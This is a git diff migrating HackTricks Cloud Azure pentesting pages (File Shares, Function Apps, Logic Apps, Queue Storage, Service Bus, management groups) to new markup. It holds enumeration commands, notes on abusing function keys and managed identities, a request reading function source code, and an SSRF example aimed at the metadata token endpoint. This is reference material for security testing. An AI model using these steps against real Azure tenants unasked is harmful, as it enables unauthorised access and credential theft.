+> Use the param `--account-key` to indicate the account key to use\
+> Use the param `--sas-token` with the SAS token to access via a SAS token
 
 ### Connection
 
@@ -112,9 +96,9 @@ These are the scripts proposed by Azure at the time of the writing to connect a
 
 You need to replace the ``, `` and `` placeholders.
 
-{% tabs %}
-{% tab title="Windows" %}
-{% code overflow="wrap" %}
+{{#tabs}}
+{{#tab name="Windows"}}
+
 ```powershell
 $connectTestResult = Test-NetConnection -ComputerName filescontainersrdtfgvhb.file.core.windows.net -Port 445
 if ($connectTestResult.TcpTestSucceeded) {
@@ -126,11 +110,11 @@ if ($connectTestResult.TcpTestSucceeded) {
     Write-Error -Message "Unable to reach the Azure storage account via port 445. Check to make sure your organization or ISP is not blocking port 445, or use Azure P2S VPN, Azure S2S VPN, or Express Route to tunnel SMB traffic over a different port."
 }
 ```
-{% endcode %}
-{% endtab %}
 
-{% tab title="Linux" %}
-{% code overflow="wrap" %}
+{{#endtab}}
+
+{{#tab name="Linux"}}
+
 ```bash
 sudo mkdir /mnt/disk-shareeifrube
 if [ ! -d "/etc/smbcredentials" ]; then
@@ -145,57 +129,44 @@ sudo chmod 600 /etc/smbcredentials/.cred
 sudo bash -c 'echo "//.file.core.windows.net/ /mnt/ cifs nofail,credentials=/etc/smbcredentials/.cred,dir_mode=0777,file_mode=0777,serverino,nosharesock,actimeo=30" >> /etc/fstab'
 sudo mount -t cifs //.file.core.windows.net/ /mnt/ -o credentials=/etc/smbcredentials/.cred,dir_mode=0777,file_mode=0777,serverino,nosharesock,actimeo=30
 ```
-{% endcode %}
-{% endtab %}
 
-{% tab title="macOS" %}
-{% code overflow="wrap" %}
+{{#endtab}}
+
+{{#tab name="macOS"}}
+
 ```bash
 open smb://:@.file.core.windows.net/
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
+
+{{#endtab}}
+{{#endtabs}}
 
 ### Regular storage enumeration (access keys, SAS...)
 
-{% content-ref url="az-storage.md" %}
-[az-storage.md](az-storage.md)
-{% endcontent-ref %}
+{{#ref}}
+az-storage.md
+{{#endref}}
 
 ## Privilege Escalation
 
 Same as storage privesc:
 
-{% content-ref url="../az-privilege-escalation/az-storage-privesc.md" %}
-[az-storage-privesc.md](../az-privilege-escalation/az-storage-privesc.md)
-{% endcontent-ref %}
+{{#ref}}
+../az-privilege-escalation/az-storage-privesc.md
+{{#endref}}
 
 ## Post Exploitation
 
-{% content-ref url="../az-post-exploitation/az-file-share-post-exploitation.md" %}
-[az-file-share-post-exploitation.md](../az-post-exploitation/az-file-share-post-exploitation.md)
-{% endcontent-ref %}
+{{#ref}}
+../az-post-exploitation/az-file-share-post-exploitation.md
+{{#endref}}
 
 ## Persistence
 
 Same as storage persistence:
 
-{% content-ref url="../az-persistence/az-storage-persistence.md" %}
-[az-storage-persistence.md](../az-persistence/az-storage-persistence.md)
-{% endcontent-ref %}
+{{#ref}}
+../az-persistence/az-storage-persistence.md
+{{#endref}}
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-services/az-function-apps.md b/src/pentesting-cloud/azure-security/az-services/az-function-apps.md
similarity index 66%
rename from pentesting-cloud/azure-security/az-services/az-function-apps.md
rename to src/pentesting-cloud/azure-security/az-services/az-function-apps.md
index a446ab37d..782dc2d1c 100644
--- a/pentesting-cloud/azure-security/az-services/az-function-apps.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-function-apps.md
@@ -1,35 +1,21 @@
 # Az - Function Apps
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Basic Information
 
 **Azure Function Apps** are a **serverless compute service** that allow you to run small pieces of code, called **functions**, without managing the underlying infrastructure. They are designed to execute code in response to various triggers, such as **HTTP requests, timers, or events from other Azure services** like Blob Storage or Event Hubs. Function Apps support multiple programming languages, including C#, Python, JavaScript, and Java, making them versatile for building **event-driven applications**, automating workflows, or integrating services. They are cost-effective, as you usually only pay for the compute time used when your code runs.
 
-{% hint style="info" %}
-Note that **Functions are a subset of the App Services**, therefore, a lot of the features discussed here will be used also by applications created as Azure Apps (`webapp` in cli).
-{% endhint %}
+> [!NOTE]
+> Note that **Functions are a subset of the App Services**, therefore, a lot of the features discussed here will be used also by applications created as Azure Apps (`webapp` in cli).
 
 ### Different Plans
 
-* **Flex Consumption Plan**: Offers **dynamic, event-driven scaling** with pay-as-you-go pricing, adding or removing function instances based on demand. It supports **virtual networking** and **pre-provisioned instances** to reduce cold starts, making it suitable for **variable workloads** that don’t require container support.
-* **Traditional Consumption Plan**: The default serverless option, where you **pay only for compute resources when functions run**. It automatically scales based on incoming events and includes **cold start optimizations**, but does not support container deployments. Ideal for **intermittent workloads** requiring automatic scaling.
-* **Premium Plan**: Designed for **consistent performance**, with **prewarmed workers** to eliminate cold starts. It offers **extended execution times, virtual networking**, and supports **custom Linux images**, making it perfect for **mission-critical applications** needing high performance and advanced features.
-* **Dedicated Plan**: Runs on dedicated virtual machines with **predictable billing** and supports manual or automatic scaling. It allows running multiple apps on the same plan, provides **compute isolation**, and ensures **secure network access** via App Service Environments, making it ideal for **long-running applications** needing consistent resource allocation.
-* **Container Apps**: Enables deploying **containerized function apps** in a managed environment, alongside microservices and APIs. It supports custom libraries, legacy app migration, and **GPU processing**, eliminating Kubernetes cluster management. Ideal for **event-driven, scalable containerized applications**.
+- **Flex Consumption Plan**: Offers **dynamic, event-driven scaling** with pay-as-you-go pricing, adding or removing function instances based on demand. It supports **virtual networking** and **pre-provisioned instances** to reduce cold starts, making it suitable for **variable workloads** that don’t require container support.
+- **Traditional Consumption Plan**: The default serverless option, where you **pay only for compute resources when functions run**. It automatically scales based on incoming events and includes **cold start optimizations**, but does not support container deployments. Ideal for **intermittent workloads** requiring automatic scaling.
+- **Premium Plan**: Designed for **consistent performance**, with **prewarmed workers** to eliminate cold starts. It offers **extended execution times, virtual networking**, and supports **custom Linux images**, making it perfect for **mission-critical applications** needing high performance and advanced features.
+- **Dedicated Plan**: Runs on dedicated virtual machines with **predictable billing** and supports manual or automatic scaling. It allows running multiple apps on the same plan, provides **compute isolation**, and ensures **secure network access** via App Service Environments, making it ideal for **long-running applications** needing consistent resource allocation.
+- **Container Apps**: Enables deploying **containerized function apps** in a managed environment, alongside microservices and APIs. It supports custom libraries, legacy app migration, and **GPU processing**, eliminating Kubernetes cluster management. Ideal for **event-driven, scalable containerized applications**.
 
 ### **Storage Buckets**
 
@@ -37,11 +23,10 @@ When creating a new Function App not containerised (but giving the code to run),
 
 Moreover, modifying the code inside the bucket (in the different formats it could be stored), the **code of the app will be modified to the new one and executed** next time the Function is called.
 
-{% hint style="danger" %}
-This is very interesting from an attackers perspective as **write access over this bucket** will allow an attacker to **compromise the code and escalate privileges** to the managed identities inside the Function App.
-
-More on this in the **privilege escalation section**.
-{% endhint %}
+> [!CAUTION]
+> This is very interesting from an attackers perspective as **write access over this bucket** will allow an attacker to **compromise the code and escalate privileges** to the managed identities inside the Function App.
+>
+> More on this in the **privilege escalation section**.
 
 It's also possible to find the **master and functions keys** stored in the storage account in the container **`azure-webjobs-secrets`** inside the folder **``** in the JSON files you can find inside.
 
@@ -51,12 +36,11 @@ Note that Functions also allow to store the code in a remote location just indic
 
 Using a HTTP trigger:
 
-* It's possible to give **access to a function to from all Internet** without requiring any authentication or give access IAM based. Although it’s also possible to restrict this access.
-* It's also possible to **give or restrict access** to a Function App from **an internal network (VPC)**.
+- It's possible to give **access to a function to from all Internet** without requiring any authentication or give access IAM based. Although it’s also possible to restrict this access.
+- It's also possible to **give or restrict access** to a Function App from **an internal network (VPC)**.
 
-{% hint style="danger" %}
-This is very interesting from an attackers perspective as it might be possible to **pivot to internal networks** from a vulnerable Function exposed to the Internet.
-{% endhint %}
+> [!CAUTION]
+> This is very interesting from an attackers perspective as it might be possible to **pivot to internal networks** from a vulnerable Function exposed to the Internet.
 
 ### **Function App Settings & Environment Variables**
 
@@ -76,11 +60,10 @@ Just like [**VMs**](vms/), Functions can have **Managed Identities** of 2 types:
 
 The **system assigned** one will be a managed identity that **only the function** that has it assigned would be able to use, while the **user assigned** managed identities are managed identities that **any other Azure service will be able to use**.
 
-{% hint style="info" %}
-Just like in [**VMs**](vms/), Functions can have **1 system assigned** managed identity and **several user assigned** ones, so it's always important to try to find all of them if you compromise the function because you might be able to escalate privileges to several managed identities from just one Function.
-
-If a no system managed identity is used but one or more user managed identities are attached to a function, by default you won’t be able to get any token.
-{% endhint %}
+> [!NOTE]
+> Just like in [**VMs**](vms/), Functions can have **1 system assigned** managed identity and **several user assigned** ones, so it's always important to try to find all of them if you compromise the function because you might be able to escalate privileges to several managed identities from just one Function.
+>
+> If a no system managed identity is used but one or more user managed identities are attached to a function, by default you won’t be able to get any token.
 
 It's possible to use the [**PEASS scripts**](https://github.com/peass-ng/PEASS-ng) to get tokens from the default managed identity from the metadata endpoint. Or you could get them **manually** as explained in:
 
@@ -90,36 +73,34 @@ Note that you need to find out a way to **check all the Managed Identities a fun
 
 ## Access Keys
 
-{% hint style="info" %}
-Note that there aren't RBAC permissions to give access to users to invoke the functions. The **function invocation depends on the trigger** selected when it was created and if a HTTP Trigger was selected, it might be needed to use an **access key**.
-{% endhint %}
+> [!NOTE]
+> Note that there aren't RBAC permissions to give access to users to invoke the functions. The **function invocation depends on the trigger** selected when it was created and if a HTTP Trigger was selected, it might be needed to use an **access key**.
 
 When creating an endpoint inside a function using a **HTTP trigger** it's possible to indicate the **access key authorization level** needed to trigger the function. Three options are available:
 
-* **ANONYMOUS**: **Everyone** can access the function by the URL.
-* **FUNCTION**: Endpoint is only accessible to users using a **function, host or master key**.
-* **ADMIN**: Endpoint is only accessible to users a **master key**.
+- **ANONYMOUS**: **Everyone** can access the function by the URL.
+- **FUNCTION**: Endpoint is only accessible to users using a **function, host or master key**.
+- **ADMIN**: Endpoint is only accessible to users a **master key**.
 
 **Type of keys:**
 
-* **Function Keys:** Function keys can be either default or user-defined and are designed to grant access exclusively to **specific function endpoints** within a Function App allowing a more fine-grained access over the endpoints.
-* **Host Keys:** Host keys, which can also be default or user-defined, provide access to **all function endpoints within a Function App with FUNCTION access level**.
-* **Master Key:** The master key (`_master`) serves as an administrative key that offers elevated permissions, including access to all function endpoints (ADMIN access lelvel included). This **key cannot be revoked.**
-* **System Keys:** System keys are **managed by specific extensions** and are required for accessing webhook endpoints used by internal components. Examples include the Event Grid trigger and Durable Functions, which utilize system keys to securely interact with their respective APIs.
+- **Function Keys:** Function keys can be either default or user-defined and are designed to grant access exclusively to **specific function endpoints** within a Function App allowing a more fine-grained access over the endpoints.
+- **Host Keys:** Host keys, which can also be default or user-defined, provide access to **all function endpoints within a Function App with FUNCTION access level**.
+- **Master Key:** The master key (`_master`) serves as an administrative key that offers elevated permissions, including access to all function endpoints (ADMIN access lelvel included). This **key cannot be revoked.**
+- **System Keys:** System keys are **managed by specific extensions** and are required for accessing webhook endpoints used by internal components. Examples include the Event Grid trigger and Durable Functions, which utilize system keys to securely interact with their respective APIs.
 
-{% hint style="success" %}
-Example to access a function API endpoint using a key:
-
-`https://.azurewebsites.net/api/?code=`
-{% endhint %}
+> [!TIP]
+> Example to access a function API endpoint using a key:
+>
+> `https://.azurewebsites.net/api/?code=`
 
 ### Basic Authentication
 
 Just like in App Services, Functions also support basic authentication to connect to **SCM** and **FTP** to deploy code using a **username and password in a URL** provided by Azure. More information about it in:
 
-{% content-ref url="az-app-services.md" %}
-[az-app-services.md](az-app-services.md)
-{% endcontent-ref %}
+{{#ref}}
+az-app-service.md
+{{#endref}}
 
 ### Github Based Deployments
 
@@ -143,8 +124,8 @@ on:
   workflow_dispatch:
 
 env:
-  AZURE_FUNCTIONAPP_PACKAGE_PATH: '.' # set this to the path to your web app project, defaults to the repository root
-  PYTHON_VERSION: '3.11' # set this to the python version to use (supports 3.6, 3.7, 3.8)
+  AZURE_FUNCTIONAPP_PACKAGE_PATH: "." # set this to the path to your web app project, defaults to the repository root
+  PYTHON_VERSION: "3.11" # set this to the python version to use (supports 3.6, 3.7, 3.8)
 
 jobs:
   build:
@@ -182,7 +163,7 @@ jobs:
   deploy:
     runs-on: ubuntu-latest
     needs: build
-    
+
     permissions:
       id-token: write #This is required for requesting the JWT
 
@@ -193,8 +174,8 @@ jobs:
           name: python-app
 
       - name: Unzip artifact for deployment
-        run: unzip release.zip     
-        
+        run: unzip release.zip
+
       - name: Login to Azure
         uses: azure/login@v2
         with:
@@ -202,33 +183,30 @@ jobs:
           tenant-id: ${{ secrets.AZUREAPPSERVICE_TENANTID_7E50AEF6222E4C3DA9272D27FB169CCD }}
           subscription-id: ${{ secrets.AZUREAPPSERVICE_SUBSCRIPTIONID_905358F484A74277BDC20978459F26F4 }}
 
-      - name: 'Deploy to Azure Functions'
+      - name: "Deploy to Azure Functions"
         uses: Azure/functions-action@v1
         id: deploy-to-function
         with:
-          app-name: 'funcGithub'
-          slot-name: 'Production'
+          app-name: "funcGithub"
+          slot-name: "Production"
           package: ${{ env.AZURE_FUNCTIONAPP_PACKAGE_PATH }}
-          
 ```
 
 

 
 Moreover, a **Managed Identity** is also created so the Github Action from the repository will be able to login into Azure with it. This is done by generating a Federated credential over the **Managed Identity** allowing the **Issuer** `https://token.actions.githubusercontent.com` and the **Subject Identifier** `repo:/:ref:refs/heads/`.
 
-{% hint style="danger" %}
-Therefore, anyone compromising that repo will be able to compromise the function and the Managed Identities attached to it.
-{% endhint %}
+> [!CAUTION]
+> Therefore, anyone compromising that repo will be able to compromise the function and the Managed Identities attached to it.
 
 ### Container Based Deployments
 
-Not all the plans allow to deploy containers, but for the ones that do, the configuration will contain the URL of the container. In the API  the **`linuxFxVersion`** setting will ha something like: `DOCKER|mcr.microsoft.com/...`, while in the web console, the configuration will show the **image settings**.
+Not all the plans allow to deploy containers, but for the ones that do, the configuration will contain the URL of the container. In the API the **`linuxFxVersion`** setting will ha something like: `DOCKER|mcr.microsoft.com/...`, while in the web console, the configuration will show the **image settings**.
 
 Moreover, **no source code will be stored in the storage** account related to the function as it's not needed.
 
 ## Enumeration
 
-{% code overflow="wrap" %}
 ```bash
 # List all the functions
 az functionapp list
@@ -249,7 +227,7 @@ az functionapp deployment source show \
 az functionapp config container show \
   --name  \
   --resource-group 
-  
+
 # Get settings (and privesc to the sorage account)
 az functionapp config appsettings list --name  --resource-group 
 
@@ -270,33 +248,19 @@ az rest --method GET \
 curl "?code="
 ## Python example
 curl "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwroot/function_app.py?code=" -v
-  
+
 # Get source code
 az rest --url "https://management.azure.com//resourceGroups//providers/Microsoft.Web/sites//hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01"
 ```
-{% endcode %}
 
 ## Privilege Escalation
 
-{% content-ref url="../az-privilege-escalation/az-functions-app-privesc.md" %}
-[az-functions-app-privesc.md](../az-privilege-escalation/az-functions-app-privesc.md)
-{% endcontent-ref %}
+{{#ref}}
+../az-privilege-escalation/az-functions-app-privesc.md
+{{#endref}}
 
 ## References
 
-* [https://learn.microsoft.com/en-us/azure/azure-functions/functions-openapi-definition](https://learn.microsoft.com/en-us/azure/azure-functions/functions-openapi-definition)
+- [https://learn.microsoft.com/en-us/azure/azure-functions/functions-openapi-definition](https://learn.microsoft.com/en-us/azure/azure-functions/functions-openapi-definition)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-services/az-logic-apps.md b/src/pentesting-cloud/azure-security/az-services/az-logic-apps.md
similarity index 52%
rename from pentesting-cloud/azure-security/az-services/az-logic-apps.md
rename to src/pentesting-cloud/azure-security/az-services/az-logic-apps.md
index 051da854b..e97474bec 100644
--- a/pentesting-cloud/azure-security/az-services/az-logic-apps.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-logic-apps.md
@@ -1,19 +1,6 @@
 # Az - Logic Apps
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Basic Information
 
@@ -23,14 +10,14 @@ Logic Apps provides a visual designer to create workflows with a **wide range of
 
 ### Examples
 
-* **Automating Data Pipelines**: Logic Apps can automate **data transfer and transformation processes** in combination with Azure Data Factory. This is useful for creating scalable and reliable data pipelines that move and transform data between various data stores, like Azure SQL Database and Azure Blob Storage, aiding in analytics and business intelligence operations.
-* **Integrating with Azure Functions**: Logic Apps can work alongside Azure Functions to develop **sophisticated, event-driven applications that scale as needed** and integrate seamlessly with other Azure services. An example use case is using a Logic App to trigger an Azure Function in response to certain events, such as changes in an Azure Storage account, allowing for dynamic data processing.
+- **Automating Data Pipelines**: Logic Apps can automate **data transfer and transformation processes** in combination with Azure Data Factory. This is useful for creating scalable and reliable data pipelines that move and transform data between various data stores, like Azure SQL Database and Azure Blob Storage, aiding in analytics and business intelligence operations.
+- **Integrating with Azure Functions**: Logic Apps can work alongside Azure Functions to develop **sophisticated, event-driven applications that scale as needed** and integrate seamlessly with other Azure services. An example use case is using a Logic App to trigger an Azure Function in response to certain events, such as changes in an Azure Storage account, allowing for dynamic data processing.
 
 ### Visualize a LogicAPP
 
 It's possible to view a LogicApp with graphics:
 
-

+

 
 or to check the code in the "**Logic app code view**" section.
 
@@ -40,18 +27,16 @@ Even if you find the **Logic App vulnerable to SSRF**, you won't be able to acce
 
 For example, something like this won't return the token:
 
-{% code overflow="wrap" %}
 ```bash
 # The URL belongs to a Logic App vulenrable to SSRF
 curl -XPOST 'https://prod-44.westus.logic.azure.com:443/workflows/2d8de4be6e974123adf0b98159966644/triggers/manual/paths/invoke?api-version=2016-10-01&sp=%2Ftriggers%2Fmanual%2Frun&sv=1.0&sig=_8_oqqsCXc0u2c7hNjtSZmT0uM4Xi3hktw6Uze0O34s' -d '{"url": "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"}' -H "Content-type: application/json" -v
 ```
-{% endcode %}
 
 ### Enumeration
 
-{% tabs %}
-{% tab title="az cli" %}
-{% code overflow="wrap" %}
+{{#tabs }}
+{{#tab name="az cli" }}
+
 ```bash
 # List
 az logic workflow list --resource-group  --subscription  --output table
@@ -62,11 +47,11 @@ az logic workflow definition show --name  --resource-group  --resource-group  --subscription 
 ```
-{% endcode %}
-{% endtab %}
 
-{% tab title="Az PowerSHell" %}
-{% code overflow="wrap" %}
+{{#endtab }}
+
+{{#tab name="Az PowerSHell" }}
+
 ```powershell
 # List
 Get-AzLogicApp -ResourceGroupName 
@@ -77,21 +62,8 @@ Get-AzLogicApp -ResourceGroupName  -Name 
 # Get service ppal used
 (Get-AzLogicApp -ResourceGroupName  -Name ).Identity
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+{{#endtab }}
+{{#endtabs }}
 
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md b/src/pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md
new file mode 100644
index 000000000..78ea357b7
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md
@@ -0,0 +1,56 @@
+# Az - Management Groups, Subscriptions & Resource Groups
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Management Groups
+
+You can find more info about Management Groups in:
+
+{{#ref}}
+../az-basic-information/
+{{#endref}}
+
+### Enumeration
+
+```bash
+# List
+az account management-group list
+# Get details and management groups and subscriptions that are children
+az account management-group show --name  --expand --recurse
+```
+
+## Subscriptions
+
+You can find more info about Subscriptions in:
+
+{{#ref}}
+../az-basic-information/
+{{#endref}}
+
+### Enumeration
+
+```bash
+# List all subscriptions
+az account list --output table
+# Get details
+az account management-group subscription show --name  --subscription 
+```
+
+## Resource Groups
+
+You can find more info about Resource Groups in:
+
+{{#ref}}
+../az-basic-information/
+{{#endref}}
+
+### Enumeration
+
+```bash
+# List all resource groups
+az group list
+# Get resource groups of specific subscription
+az group list --subscription "" --output table
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-services/az-queue-enum.md b/src/pentesting-cloud/azure-security/az-services/az-queue-enum.md
new file mode 100644
index 000000000..a2ccb7cc9
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-services/az-queue-enum.md
@@ -0,0 +1,95 @@
+# Az - Queue Storage
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+Azure Queue Storage is a service in Microsoft's Azure cloud platform designed for message queuing between application components, **enabling asynchronous communication and decoupling**. It allows you to store an unlimited number of messages, each up to 64 KB in size, and supports operations such as creating and deleting queues, adding, retrieving, updating, and deleting messages, as well as managing metadata and access policies. While it typically processes messages in a first-in-first-out (FIFO) manner, strict FIFO is not guaranteed.
+
+### Enumeration
+
+{{#tabs }}
+{{#tab name="Az Cli" }}
+
+```bash
+# You need to know the --account-name of the storage (az storage account list)
+az storage queue list --account-name 
+
+# Queue Metadata
+az storage queue metadata show --name  --account-name 
+
+#Get ACL
+az storage queue policy list --queue-name  --account-name 
+
+# Get Messages (getting a message deletes it)
+az storage message get --queue-name  --account-name 
+
+# Peek Messages
+az storage message peek --queue-name  --account-name 
+```
+
+{{#endtab }}
+
+{{#tab name="Az PS" }}
+
+```bash
+# Get the Storage Context
+$storageAccount = Get-AzStorageAccount -ResourceGroupName QueueResourceGroup -Name queuestorageaccount1994
+$ctx = $storageAccount.Context
+
+# Set Variables for Storage Account
+$storageAccountName = "queuestorageaccount"
+
+# List Queues
+Get-AzStorageQueue -Context $context
+$queueName = "myqueue"
+
+# Retrieve a specific queue
+$queue = Get-AzStorageQueue -Name $queueName -Context $context
+$queue # Show the properties of the queue
+
+# Retrieve the access policies for the queue
+$accessPolicies = Get-AzStorageQueueStoredAccessPolicy -Context $context -QueueName $queueName
+$accessPolicies
+
+# Peek Messages
+$queueMessage = $queue.QueueClient.PeekMessage()
+$queueMessage.Value
+
+# Set the amount of time you want to entry to be invisible after read from the queue
+# If it is not deleted by the end of this time, it will show up in the queue again
+$visibilityTimeout = [System.TimeSpan]::FromSeconds(10)
+
+# Read the messages from the queue, then show the contents of the messages.
+$queueMessage = $queue.QueueClient.ReceiveMessages(1,$visibilityTimeout)
+$queueMessage.Value
+```
+
+{{#endtab }}
+{{#endtabs }}
+
+### Privilege Escalation
+
+{{#ref}}
+../az-privilege-escalation/az-queue-privesc.md
+{{#endref}}
+
+### Post Exploitation
+
+{{#ref}}
+../az-post-exploitation/az-queue-post-exploitation.md
+{{#endref}}
+
+### Persistence
+
+{{#ref}}
+../az-persistence/az-queue-persistance.md
+{{#endref}}
+
+## References
+
+- https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues
+- https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api
+- https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-services/az-servicebus-enum.md b/src/pentesting-cloud/azure-security/az-services/az-servicebus-enum.md
similarity index 54%
rename from pentesting-cloud/azure-security/az-services/az-servicebus-enum.md
rename to src/pentesting-cloud/azure-security/az-services/az-servicebus-enum.md
index f65b1df8c..9a2b8b490 100644
--- a/pentesting-cloud/azure-security/az-services/az-servicebus-enum.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-servicebus-enum.md
@@ -1,37 +1,25 @@
 # Az - Service Bus Enum
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Service Bus
 
-Azure Service Bus is a cloud-based **messaging service** designed to enable reliable **communication between different parts of an application or separate applications**. It acts as a secure middleman, ensuring messages are safely delivered, even if the sender and receiver aren’t operating simultaneously. By decoupling systems, it allows applications to work independently while still exchanging data or instructions. It’s particularly useful for scenarios requiring load balancing across multiple workers, reliable message delivery, or complex coordination, such as processing tasks in order or securely managing access. 
+Azure Service Bus is a cloud-based **messaging service** designed to enable reliable **communication between different parts of an application or separate applications**. It acts as a secure middleman, ensuring messages are safely delivered, even if the sender and receiver aren’t operating simultaneously. By decoupling systems, it allows applications to work independently while still exchanging data or instructions. It’s particularly useful for scenarios requiring load balancing across multiple workers, reliable message delivery, or complex coordination, such as processing tasks in order or securely managing access.
 
 ### Key Concepts
 
 1. **Queues:** its purpose is to store messages until the receiver is ready.
-    - Messages are ordered, timestamped, and durably stored.
-    - Delivered in pull mode (on-demand retrieval).
-    - Supports point-to-point communication.
+   - Messages are ordered, timestamped, and durably stored.
+   - Delivered in pull mode (on-demand retrieval).
+   - Supports point-to-point communication.
 2. **Topics:** Publish-subscribe messaging for broadcasting.
-    - Multiple independent subscriptions receive copies of messages.
-    - Subscriptions can have rules/filters to control delivery or add metadata.
-    - Supports many-to-many communication.
+   - Multiple independent subscriptions receive copies of messages.
+   - Subscriptions can have rules/filters to control delivery or add metadata.
+   - Supports many-to-many communication.
 3. **Namespaces:** A container for all messaging components, queues and topics, is like your own slice of a powerful Azure cluster, providing dedicated capacity and optionally spanning across three availability zones.
 
 ### Advance Features
+
 Some advance features are:
 
